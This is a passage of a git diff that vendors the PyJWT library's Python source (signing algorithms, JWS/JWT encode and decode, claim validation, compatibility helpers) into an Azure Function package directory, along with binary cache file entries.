encode_parser.set_defaults(func=encode_payload) + + # Decode subcommand + decode_parser = subparsers.add_parser('decode', help='use to decode a supplied JSON web token') + decode_parser.add_argument( + 'token', + help='JSON web token to decode.', + nargs='?') + + decode_parser.add_argument( + '-n', '--no-verify', + action='store_false', + dest='verify', + default=True, + help='ignore signature and claims verification on decode' + ) + + decode_parser.set_defaults(func=decode_payload) + + return arg_parser + + +def main(): + arg_parser = build_argparser() + + try: + arguments = arg_parser.parse_args(sys.argv[1:]) + + output = arguments.func(arguments) + + print(output) + except Exception as e: + print('There was an unforseen error: ', e) + arg_parser.print_help() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..218427c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/__main__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/__main__.cpython-39.pyc new file mode 100644 index 0000000..3690dba Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/__main__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/algorithms.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/algorithms.cpython-39.pyc new file mode 100644 index 0000000..0a8db72 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/algorithms.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/api_jws.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/api_jws.cpython-39.pyc new file mode 100644 index 0000000..226844e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/api_jws.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/api_jwt.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/api_jwt.cpython-39.pyc new file mode 100644 index 0000000..6096a3d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/api_jwt.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/compat.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/compat.cpython-39.pyc new file mode 100644 index 0000000..e81b5c6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/compat.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/exceptions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/exceptions.cpython-39.pyc new file mode 100644 index 0000000..ac764d6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/exceptions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/help.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/help.cpython-39.pyc new file mode 100644 index 0000000..0ac9e37 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/help.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/utils.cpython-39.pyc new file mode 100644 index 0000000..24c45f3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/__pycache__/utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/algorithms.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/algorithms.py new file mode 100644 index 0000000..8355961 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/algorithms.py @@ -0,0 +1,403 @@ +import hashlib +import hmac +import json + + +from .compat import constant_time_compare, string_types +from .exceptions import InvalidKeyError +from .utils import ( + base64url_decode, base64url_encode, der_to_raw_signature, + force_bytes, force_unicode, from_base64url_uint, raw_to_der_signature, + to_base64url_uint +) + +try: + from cryptography.hazmat.primitives import hashes + from cryptography.hazmat.primitives.serialization import ( + load_pem_private_key, load_pem_public_key, load_ssh_public_key + ) + from cryptography.hazmat.primitives.asymmetric.rsa import ( + RSAPrivateKey, RSAPublicKey, RSAPrivateNumbers, RSAPublicNumbers, + rsa_recover_prime_factors, rsa_crt_dmp1, rsa_crt_dmq1, rsa_crt_iqmp + ) + from cryptography.hazmat.primitives.asymmetric.ec import ( + EllipticCurvePrivateKey, EllipticCurvePublicKey + ) + from cryptography.hazmat.primitives.asymmetric import ec, padding + from cryptography.hazmat.backends import default_backend + from cryptography.exceptions import InvalidSignature + + has_crypto = True +except ImportError: + has_crypto = False + +requires_cryptography = set(['RS256', 'RS384', 'RS512', 'ES256', 'ES384', + 'ES521', 'ES512', 'PS256', 'PS384', 'PS512']) + + +def get_default_algorithms(): + """ + Returns the algorithms that are implemented by the library. + """ + default_algorithms = { + 'none': NoneAlgorithm(), + 'HS256': HMACAlgorithm(HMACAlgorithm.SHA256), + 'HS384': HMACAlgorithm(HMACAlgorithm.SHA384), + 'HS512': HMACAlgorithm(HMACAlgorithm.SHA512) + } + + if has_crypto: + default_algorithms.update({ + 'RS256': RSAAlgorithm(RSAAlgorithm.SHA256), + 'RS384': RSAAlgorithm(RSAAlgorithm.SHA384), + 'RS512': RSAAlgorithm(RSAAlgorithm.SHA512), + 'ES256': ECAlgorithm(ECAlgorithm.SHA256), + 'ES384': ECAlgorithm(ECAlgorithm.SHA384), + 'ES521': ECAlgorithm(ECAlgorithm.SHA512), + 'ES512': ECAlgorithm(ECAlgorithm.SHA512), # Backward compat for #219 fix + 'PS256': RSAPSSAlgorithm(RSAPSSAlgorithm.SHA256), + 'PS384': RSAPSSAlgorithm(RSAPSSAlgorithm.SHA384), + 'PS512': RSAPSSAlgorithm(RSAPSSAlgorithm.SHA512) + }) + + return default_algorithms + + +class Algorithm(object): + """ + The interface for an algorithm used to sign and verify tokens. + """ + def prepare_key(self, key): + """ + Performs necessary validation and conversions on the key and returns + the key value in the proper format for sign() and verify(). + """ + raise NotImplementedError + + def sign(self, msg, key): + """ + Returns a digital signature for the specified message + using the specified key value. + """ + raise NotImplementedError + + def verify(self, msg, key, sig): + """ + Verifies that the specified digital signature is valid + for the specified message and key values. + """ + raise NotImplementedError + + @staticmethod + def to_jwk(key_obj): + """ + Serializes a given RSA key into a JWK + """ + raise NotImplementedError + + @staticmethod + def from_jwk(jwk): + """ + Deserializes a given RSA key from JWK back into a PublicKey or PrivateKey object + """ + raise NotImplementedError + + +class NoneAlgorithm(Algorithm): + """ + Placeholder for use when no signing or verification + operations are required. + """ + def prepare_key(self, key): + if key == '': + key = None + + if key is not None: + raise InvalidKeyError('When alg = "none", key value must be None.') + + return key + + def sign(self, msg, key): + return b'' + + def verify(self, msg, key, sig): + return False + + +class HMACAlgorithm(Algorithm): + """ + Performs signing and verification operations using HMAC + and the specified hash function. + """ + SHA256 = hashlib.sha256 + SHA384 = hashlib.sha384 + SHA512 = hashlib.sha512 + + def __init__(self, hash_alg): + self.hash_alg = hash_alg + + def prepare_key(self, key): + key = force_bytes(key) + + invalid_strings = [ + b'-----BEGIN PUBLIC KEY-----', + b'-----BEGIN CERTIFICATE-----', + b'-----BEGIN RSA PUBLIC KEY-----', + b'ssh-rsa' + ] + + if any([string_value in key for string_value in invalid_strings]): + raise InvalidKeyError( + 'The specified key is an asymmetric key or x509 certificate and' + ' should not be used as an HMAC secret.') + + return key + + @staticmethod + def to_jwk(key_obj): + return json.dumps({ + 'k': force_unicode(base64url_encode(force_bytes(key_obj))), + 'kty': 'oct' + }) + + @staticmethod + def from_jwk(jwk): + obj = json.loads(jwk) + + if obj.get('kty') != 'oct': + raise InvalidKeyError('Not an HMAC key') + + return base64url_decode(obj['k']) + + def sign(self, msg, key): + return hmac.new(key, msg, self.hash_alg).digest() + + def verify(self, msg, key, sig): + return constant_time_compare(sig, self.sign(msg, key)) + + +if has_crypto: + + class RSAAlgorithm(Algorithm): + """ + Performs signing and verification operations using + RSASSA-PKCS-v1_5 and the specified hash function. + """ + SHA256 = hashes.SHA256 + SHA384 = hashes.SHA384 + SHA512 = hashes.SHA512 + + def __init__(self, hash_alg): + self.hash_alg = hash_alg + + def prepare_key(self, key): + if isinstance(key, RSAPrivateKey) or \ + isinstance(key, RSAPublicKey): + return key + + if isinstance(key, string_types): + key = force_bytes(key) + + try: + if key.startswith(b'ssh-rsa'): + key = load_ssh_public_key(key, backend=default_backend()) + else: + key = load_pem_private_key(key, password=None, backend=default_backend()) + except ValueError: + key = load_pem_public_key(key, backend=default_backend()) + else: + raise TypeError('Expecting a PEM-formatted key.') + + return key + + @staticmethod + def to_jwk(key_obj): + obj = None + + if getattr(key_obj, 'private_numbers', None): + # Private key + numbers = key_obj.private_numbers() + + obj = { + 'kty': 'RSA', + 'key_ops': ['sign'], + 'n': force_unicode(to_base64url_uint(numbers.public_numbers.n)), + 'e': force_unicode(to_base64url_uint(numbers.public_numbers.e)), + 'd': force_unicode(to_base64url_uint(numbers.d)), + 'p': force_unicode(to_base64url_uint(numbers.p)), + 'q': force_unicode(to_base64url_uint(numbers.q)), + 'dp': force_unicode(to_base64url_uint(numbers.dmp1)), + 'dq': force_unicode(to_base64url_uint(numbers.dmq1)), + 'qi': force_unicode(to_base64url_uint(numbers.iqmp)) + } + + elif getattr(key_obj, 'verify', None): + # Public key + numbers = key_obj.public_numbers() + + obj = { + 'kty': 'RSA', + 'key_ops': ['verify'], + 'n': force_unicode(to_base64url_uint(numbers.n)), + 'e': force_unicode(to_base64url_uint(numbers.e)) + } + else: + raise InvalidKeyError('Not a public or private key') + + return json.dumps(obj) + + @staticmethod + def from_jwk(jwk): + try: + obj = json.loads(jwk) + except ValueError: + raise InvalidKeyError('Key is not valid JSON') + + if obj.get('kty') != 'RSA': + raise InvalidKeyError('Not an RSA key') + + if 'd' in obj and 'e' in obj and 'n' in obj: + # Private key + if 'oth' in obj: + raise InvalidKeyError('Unsupported RSA private key: > 2 primes not supported') + + other_props = ['p', 'q', 'dp', 'dq', 'qi'] + props_found = [prop in obj for prop in other_props] + any_props_found = any(props_found) + + if any_props_found and not all(props_found): + raise InvalidKeyError('RSA key must include all parameters if any are present besides d') + + public_numbers = RSAPublicNumbers( + from_base64url_uint(obj['e']), from_base64url_uint(obj['n']) + ) + + if any_props_found: + numbers = RSAPrivateNumbers( + d=from_base64url_uint(obj['d']), + p=from_base64url_uint(obj['p']), + q=from_base64url_uint(obj['q']), + dmp1=from_base64url_uint(obj['dp']), + dmq1=from_base64url_uint(obj['dq']), + iqmp=from_base64url_uint(obj['qi']), + public_numbers=public_numbers + ) + else: + d = from_base64url_uint(obj['d']) + p, q = rsa_recover_prime_factors( + public_numbers.n, d, public_numbers.e + ) + + numbers = RSAPrivateNumbers( + d=d, + p=p, + q=q, + dmp1=rsa_crt_dmp1(d, p), + dmq1=rsa_crt_dmq1(d, q), + iqmp=rsa_crt_iqmp(p, q), + public_numbers=public_numbers + ) + + return numbers.private_key(default_backend()) + elif 'n' in obj and 'e' in obj: + # Public key + numbers = RSAPublicNumbers( + from_base64url_uint(obj['e']), from_base64url_uint(obj['n']) + ) + + return numbers.public_key(default_backend()) + else: + raise InvalidKeyError('Not a public or private key') + + def sign(self, msg, key): + return key.sign(msg, padding.PKCS1v15(), self.hash_alg()) + + def verify(self, msg, key, sig): + try: + key.verify(sig, msg, padding.PKCS1v15(), self.hash_alg()) + return True + except InvalidSignature: + return False + + class ECAlgorithm(Algorithm): + """ + Performs signing and verification operations using + ECDSA and the specified hash function + """ + SHA256 = hashes.SHA256 + SHA384 = hashes.SHA384 + SHA512 = hashes.SHA512 + + def __init__(self, hash_alg): + self.hash_alg = hash_alg + + def prepare_key(self, key): + if isinstance(key, EllipticCurvePrivateKey) or \ + isinstance(key, EllipticCurvePublicKey): + return key + + if isinstance(key, string_types): + key = force_bytes(key) + + # Attempt to load key. We don't know if it's + # a Signing Key or a Verifying Key, so we try + # the Verifying Key first. + try: + if key.startswith(b'ecdsa-sha2-'): + key = load_ssh_public_key(key, backend=default_backend()) + else: + key = load_pem_public_key(key, backend=default_backend()) + except ValueError: + key = load_pem_private_key(key, password=None, backend=default_backend()) + + else: + raise TypeError('Expecting a PEM-formatted key.') + + return key + + def sign(self, msg, key): + der_sig = key.sign(msg, ec.ECDSA(self.hash_alg())) + + return der_to_raw_signature(der_sig, key.curve) + + def verify(self, msg, key, sig): + try: + der_sig = raw_to_der_signature(sig, key.curve) + except ValueError: + return False + + try: + key.verify(der_sig, msg, ec.ECDSA(self.hash_alg())) + return True + except InvalidSignature: + return False + + class RSAPSSAlgorithm(RSAAlgorithm): + """ + Performs a signature using RSASSA-PSS with MGF1 + """ + + def sign(self, msg, key): + return key.sign( + msg, + padding.PSS( + mgf=padding.MGF1(self.hash_alg()), + salt_length=self.hash_alg.digest_size + ), + self.hash_alg() + ) + + def verify(self, msg, key, sig): + try: + key.verify( + sig, + msg, + padding.PSS( + mgf=padding.MGF1(self.hash_alg()), + salt_length=self.hash_alg.digest_size + ), + self.hash_alg() + ) + return True + except InvalidSignature: + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/api_jws.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/api_jws.py new file mode 100644 index 0000000..de068a7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/api_jws.py @@ -0,0 +1,242 @@ +import binascii +import json +import warnings +try: + # import required by mypy to perform type checking, not used for normal execution + from typing import Callable, Dict, List, Optional, Union # NOQA +except ImportError: + pass + +from .algorithms import ( + Algorithm, get_default_algorithms, has_crypto, requires_cryptography # NOQA +) +from .compat import Mapping, binary_type, string_types, text_type +from .exceptions import ( + DecodeError, InvalidAlgorithmError, InvalidSignatureError, + InvalidTokenError +) +from .utils import base64url_decode, base64url_encode, force_bytes, merge_dict + + +class PyJWS(object): + header_typ = 'JWT' + + def __init__(self, algorithms=None, options=None): + self._algorithms = get_default_algorithms() + self._valid_algs = (set(algorithms) if algorithms is not None + else set(self._algorithms)) + + # Remove algorithms that aren't on the whitelist + for key in list(self._algorithms.keys()): + if key not in self._valid_algs: + del self._algorithms[key] + + if not options: + options = {} + + self.options = merge_dict(self._get_default_options(), options) + + @staticmethod + def _get_default_options(): + return { + 'verify_signature': True + } + + def register_algorithm(self, alg_id, alg_obj): + """ + Registers a new Algorithm for use when creating and verifying tokens. + """ + if alg_id in self._algorithms: + raise ValueError('Algorithm already has a handler.') + + if not isinstance(alg_obj, Algorithm): + raise TypeError('Object is not of type `Algorithm`') + + self._algorithms[alg_id] = alg_obj + self._valid_algs.add(alg_id) + + def unregister_algorithm(self, alg_id): + """ + Unregisters an Algorithm for use when creating and verifying tokens + Throws KeyError if algorithm is not registered. + """ + if alg_id not in self._algorithms: + raise KeyError('The specified algorithm could not be removed' + ' because it is not registered.') + + del self._algorithms[alg_id] + self._valid_algs.remove(alg_id) + + def get_algorithms(self): + """ + Returns a list of supported values for the 'alg' parameter. + """ + return list(self._valid_algs) + + def encode(self, + payload, # type: Union[Dict, bytes] + key, # type: str + algorithm='HS256', # type: str + headers=None, # type: Optional[Dict] + json_encoder=None # type: Optional[Callable] + ): + segments = [] + + if algorithm is None: + algorithm = 'none' + + if algorithm not in self._valid_algs: + pass + + # Header + header = {'typ': self.header_typ, 'alg': algorithm} + + if headers: + self._validate_headers(headers) + header.update(headers) + + json_header = force_bytes( + json.dumps( + header, + separators=(',', ':'), + cls=json_encoder + ) + ) + + segments.append(base64url_encode(json_header)) + segments.append(base64url_encode(payload)) + + # Segments + signing_input = b'.'.join(segments) + try: + alg_obj = self._algorithms[algorithm] + key = alg_obj.prepare_key(key) + signature = alg_obj.sign(signing_input, key) + + except KeyError: + if not has_crypto and algorithm in requires_cryptography: + raise NotImplementedError( + "Algorithm '%s' could not be found. Do you have cryptography " + "installed?" % algorithm + ) + else: + raise NotImplementedError('Algorithm not supported') + + segments.append(base64url_encode(signature)) + + return b'.'.join(segments) + + def decode(self, + jwt, # type: str + key='', # type: str + verify=True, # type: bool + algorithms=None, # type: List[str] + options=None, # type: Dict + **kwargs): + + merged_options = merge_dict(self.options, options) + verify_signature = merged_options['verify_signature'] + + if verify_signature and not algorithms: + warnings.warn( + 'It is strongly recommended that you pass in a ' + + 'value for the "algorithms" argument when calling decode(). ' + + 'This argument will be mandatory in a future version.', + DeprecationWarning + ) + + payload, signing_input, header, signature = self._load(jwt) + + if not verify: + warnings.warn('The verify parameter is deprecated. ' + 'Please use verify_signature in options instead.', + DeprecationWarning, stacklevel=2) + elif verify_signature: + self._verify_signature(payload, signing_input, header, signature, + key, algorithms) + + return payload + + def get_unverified_header(self, jwt): + """Returns back the JWT header parameters as a dict() + + Note: The signature is not verified so the header parameters + should not be fully trusted until signature verification is complete + """ + headers = self._load(jwt)[2] + self._validate_headers(headers) + + return headers + + def _load(self, jwt): + if isinstance(jwt, text_type): + jwt = jwt.encode('utf-8') + + if not issubclass(type(jwt), binary_type): + raise DecodeError("Invalid token type. Token must be a {0}".format( + binary_type)) + + try: + signing_input, crypto_segment = jwt.rsplit(b'.', 1) + header_segment, payload_segment = signing_input.split(b'.', 1) + except ValueError: + raise DecodeError('Not enough segments') + + try: + header_data = base64url_decode(header_segment) + except (TypeError, binascii.Error): + raise DecodeError('Invalid header padding') + + try: + header = json.loads(header_data.decode('utf-8')) + except ValueError as e: + raise DecodeError('Invalid header string: %s' % e) + + if not isinstance(header, Mapping): + raise DecodeError('Invalid header string: must be a json object') + + try: + payload = base64url_decode(payload_segment) + except (TypeError, binascii.Error): + raise DecodeError('Invalid payload padding') + + try: + signature = base64url_decode(crypto_segment) + except (TypeError, binascii.Error): + raise DecodeError('Invalid crypto padding') + + return (payload, signing_input, header, signature) + + def _verify_signature(self, payload, signing_input, header, signature, + key='', algorithms=None): + + alg = header.get('alg') + + if algorithms is not None and alg not in algorithms: + raise InvalidAlgorithmError('The specified alg value is not allowed') + + try: + alg_obj = self._algorithms[alg] + key = alg_obj.prepare_key(key) + + if not alg_obj.verify(signing_input, key, signature): + raise InvalidSignatureError('Signature verification failed') + + except KeyError: + raise InvalidAlgorithmError('Algorithm not supported') + + def _validate_headers(self, headers): + if 'kid' in headers: + self._validate_kid(headers['kid']) + + def _validate_kid(self, kid): + if not isinstance(kid, string_types): + raise InvalidTokenError('Key ID header parameter must be a string') + + +_jws_global_obj = PyJWS() +encode = _jws_global_obj.encode +decode = _jws_global_obj.decode +register_algorithm = _jws_global_obj.register_algorithm +unregister_algorithm = _jws_global_obj.unregister_algorithm +get_unverified_header = _jws_global_obj.get_unverified_header diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/api_jwt.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/api_jwt.py new file mode 100644 index 0000000..67fdbf8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/api_jwt.py @@ -0,0 +1,222 @@ +import json +import warnings +from calendar import timegm +from datetime import datetime, timedelta +try: + # import required by mypy to perform type checking, not used for normal execution + from typing import Callable, Dict, List, Optional, Union # NOQA +except ImportError: + pass + +from .api_jws import PyJWS +from .algorithms import Algorithm, get_default_algorithms # NOQA +from .compat import Iterable, Mapping, string_types +from .exceptions import ( + DecodeError, ExpiredSignatureError, ImmatureSignatureError, + InvalidAudienceError, InvalidIssuedAtError, + InvalidIssuerError, MissingRequiredClaimError +) +from .utils import merge_dict + + +class PyJWT(PyJWS): + header_type = 'JWT' + + @staticmethod + def _get_default_options(): + # type: () -> Dict[str, bool] + return { + 'verify_signature': True, + 'verify_exp': True, + 'verify_nbf': True, + 'verify_iat': True, + 'verify_aud': True, + 'verify_iss': True, + 'require_exp': False, + 'require_iat': False, + 'require_nbf': False + } + + def encode(self, + payload, # type: Union[Dict, bytes] + key, # type: str + algorithm='HS256', # type: str + headers=None, # type: Optional[Dict] + json_encoder=None # type: Optional[Callable] + ): + # Check that we get a mapping + if not isinstance(payload, Mapping): + raise TypeError('Expecting a mapping object, as JWT only supports ' + 'JSON objects as payloads.') + + # Payload + for time_claim in ['exp', 'iat', 'nbf']: + # Convert datetime to a intDate value in known time-format claims + if isinstance(payload.get(time_claim), datetime): + payload[time_claim] = timegm(payload[time_claim].utctimetuple()) # type: ignore + + json_payload = json.dumps( + payload, + separators=(',', ':'), + cls=json_encoder + ).encode('utf-8') + + return super(PyJWT, self).encode( + json_payload, key, algorithm, headers, json_encoder + ) + + def decode(self, + jwt, # type: str + key='', # type: str + verify=True, # type: bool + algorithms=None, # type: List[str] + options=None, # type: Dict + **kwargs): + + if verify and not algorithms: + warnings.warn( + 'It is strongly recommended that you pass in a ' + + 'value for the "algorithms" argument when calling decode(). ' + + 'This argument will be mandatory in a future version.', + DeprecationWarning + ) + + payload, _, _, _ = self._load(jwt) + + if options is None: + options = {'verify_signature': verify} + else: + options.setdefault('verify_signature', verify) + + decoded = super(PyJWT, self).decode( + jwt, key=key, algorithms=algorithms, options=options, **kwargs + ) + + try: + payload = json.loads(decoded.decode('utf-8')) + except ValueError as e: + raise DecodeError('Invalid payload string: %s' % e) + if not isinstance(payload, Mapping): + raise DecodeError('Invalid payload string: must be a json object') + + if verify: + merged_options = merge_dict(self.options, options) + self._validate_claims(payload, merged_options, **kwargs) + + return payload + + def _validate_claims(self, payload, options, audience=None, issuer=None, + leeway=0, **kwargs): + + if 'verify_expiration' in kwargs: + options['verify_exp'] = kwargs.get('verify_expiration', True) + warnings.warn('The verify_expiration parameter is deprecated. ' + 'Please use verify_exp in options instead.', + DeprecationWarning) + + if isinstance(leeway, timedelta): + leeway = leeway.total_seconds() + + if not isinstance(audience, (string_types, type(None), Iterable)): + raise TypeError('audience must be a string, iterable, or None') + + self._validate_required_claims(payload, options) + + now = timegm(datetime.utcnow().utctimetuple()) + + if 'iat' in payload and options.get('verify_iat'): + self._validate_iat(payload, now, leeway) + + if 'nbf' in payload and options.get('verify_nbf'): + self._validate_nbf(payload, now, leeway) + + if 'exp' in payload and options.get('verify_exp'): + self._validate_exp(payload, now, leeway) + + if options.get('verify_iss'): + self._validate_iss(payload, issuer) + + if options.get('verify_aud'): + self._validate_aud(payload, audience) + + def _validate_required_claims(self, payload, options): + if options.get('require_exp') and payload.get('exp') is None: + raise MissingRequiredClaimError('exp') + + if options.get('require_iat') and payload.get('iat') is None: + raise MissingRequiredClaimError('iat') + + if options.get('require_nbf') and payload.get('nbf') is None: + raise MissingRequiredClaimError('nbf') + + def _validate_iat(self, payload, now, leeway): + try: + int(payload['iat']) + except ValueError: + raise InvalidIssuedAtError('Issued At claim (iat) must be an integer.') + + def _validate_nbf(self, payload, now, leeway): + try: + nbf = int(payload['nbf']) + except ValueError: + raise DecodeError('Not Before claim (nbf) must be an integer.') + + if nbf > (now + leeway): + raise ImmatureSignatureError('The token is not yet valid (nbf)') + + def _validate_exp(self, payload, now, leeway): + try: + exp = int(payload['exp']) + except ValueError: + raise DecodeError('Expiration Time claim (exp) must be an' + ' integer.') + + if exp < (now - leeway): + raise ExpiredSignatureError('Signature has expired') + + def _validate_aud(self, payload, audience): + if audience is None and 'aud' not in payload: + return + + if audience is not None and 'aud' not in payload: + # Application specified an audience, but it could not be + # verified since the token does not contain a claim. + raise MissingRequiredClaimError('aud') + + if audience is None and 'aud' in payload: + # Application did not specify an audience, but + # the token has the 'aud' claim + raise InvalidAudienceError('Invalid audience') + + audience_claims = payload['aud'] + + if isinstance(audience_claims, string_types): + audience_claims = [audience_claims] + if not isinstance(audience_claims, list): + raise InvalidAudienceError('Invalid claim format in token') + if any(not isinstance(c, string_types) for c in audience_claims): + raise InvalidAudienceError('Invalid claim format in token') + + if isinstance(audience, string_types): + audience = [audience] + + if not any(aud in audience_claims for aud in audience): + raise InvalidAudienceError('Invalid audience') + + def _validate_iss(self, payload, issuer): + if issuer is None: + return + + if 'iss' not in payload: + raise MissingRequiredClaimError('iss') + + if payload['iss'] != issuer: + raise InvalidIssuerError('Invalid issuer') + + +_jwt_global_obj = PyJWT() +encode = _jwt_global_obj.encode +decode = _jwt_global_obj.decode +register_algorithm = _jwt_global_obj.register_algorithm +unregister_algorithm = _jwt_global_obj.unregister_algorithm +get_unverified_header = _jwt_global_obj.get_unverified_header diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/compat.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/compat.py new file mode 100644 index 0000000..69d75ec --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/compat.py @@ -0,0 +1,68 @@ +""" +The `compat` module provides support for backwards compatibility with older +versions of python, and compatibility wrappers around optional packages. +""" +# flake8: noqa +import hmac +import struct +import sys + + +PY3 = sys.version_info[0] == 3 + + +if PY3: + text_type = str + binary_type = bytes +else: + text_type = unicode + binary_type = str + +string_types = (text_type, binary_type) + +try: + # Importing ABCs from collections will be removed in PY3.8 + from collections.abc import Iterable, Mapping +except ImportError: + from collections import Iterable, Mapping + +try: + constant_time_compare = hmac.compare_digest +except AttributeError: + # Fallback for Python < 2.7 + def constant_time_compare(val1, val2): + """ + Returns True if the two strings are equal, False otherwise. + + The time taken is independent of the number of characters that match. + """ + if len(val1) != len(val2): + return False + + result = 0 + + for x, y in zip(val1, val2): + result |= ord(x) ^ ord(y) + + return result == 0 + +# Use int.to_bytes if it exists (Python 3) +if getattr(int, 'to_bytes', None): + def bytes_from_int(val): + remaining = val + byte_length = 0 + + while remaining != 0: + remaining = remaining >> 8 + byte_length += 1 + + return val.to_bytes(byte_length, 'big', signed=False) +else: + def bytes_from_int(val): + buf = [] + while val: + val, remainder = divmod(val, 256) + buf.append(remainder) + + buf.reverse() + return struct.pack('%sB' % len(buf), *buf) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..80045f8 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..f00f3dc Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__pycache__/py_ecdsa.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__pycache__/py_ecdsa.cpython-39.pyc new file mode 100644 index 0000000..37ac44f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__pycache__/py_ecdsa.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__pycache__/pycrypto.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__pycache__/pycrypto.cpython-39.pyc new file mode 100644 index 0000000..f976f00 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/__pycache__/pycrypto.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/py_ecdsa.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/py_ecdsa.py new file mode 100644 index 0000000..9350269 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/py_ecdsa.py @@ -0,0 +1,60 @@ +# Note: This file is named py_ecdsa.py because import behavior in Python 2 +# would cause ecdsa.py to squash the ecdsa library that it depends upon. + +import hashlib + +import ecdsa + +from jwt.algorithms import Algorithm +from jwt.compat import string_types, text_type + + +class ECAlgorithm(Algorithm): + """ + Performs signing and verification operations using + ECDSA and the specified hash function + + This class 